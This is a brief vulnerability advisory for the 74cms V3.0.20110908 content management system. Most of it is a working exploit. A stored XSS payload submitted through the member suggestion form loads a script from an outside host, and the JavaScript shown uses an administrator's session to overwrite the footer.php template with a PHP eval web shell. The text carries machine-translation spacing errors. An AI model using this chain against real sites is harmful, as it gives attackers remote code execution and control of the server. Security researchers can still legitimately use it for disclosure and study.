Http://www.74cms.com/
Affected Version: 74cms V3.0.20110908
Author: insight
Vulnerability details:
Registered User --> member center --> suggestion --> submit comments 1 "> 1 <script src =" http://nophack.tk/x.js "> </script> 1 --> wait for the Administrator to log on
Log on as an administrator --> View "comments/suggestions to be replied" --> .....
Js content:
Var Shelldata = 'tpl _ content = % 3C % 3 Fphp % 20 eval % 28% 24_POST % 5 Bxdxd % 5D % 29% 3F % 3E & tpl_dir = default & tpl_name = footer. php & del_Submit = % B1 % A3 % B4 % E6 '; try {var xml = window. XMLHttpRequest? (New XMLHttpRequest (): (new ActiveXObject ('Microsoft. xmlhttp'); xml. open ("POST", 'admin _ templates. php? Act = do_edit ', false); xml. setRequestHeader ('content-type', 'application/x-www-form-urlencoded'); xml. onreadystatechange = function () {if (xml. readyState = 4) {}}; xml. send (Shelldata);} catch (e ){}
Http://www.bkjia.com/74cmsv3/templates/default/footer. php
Solution:
Wait for official Processing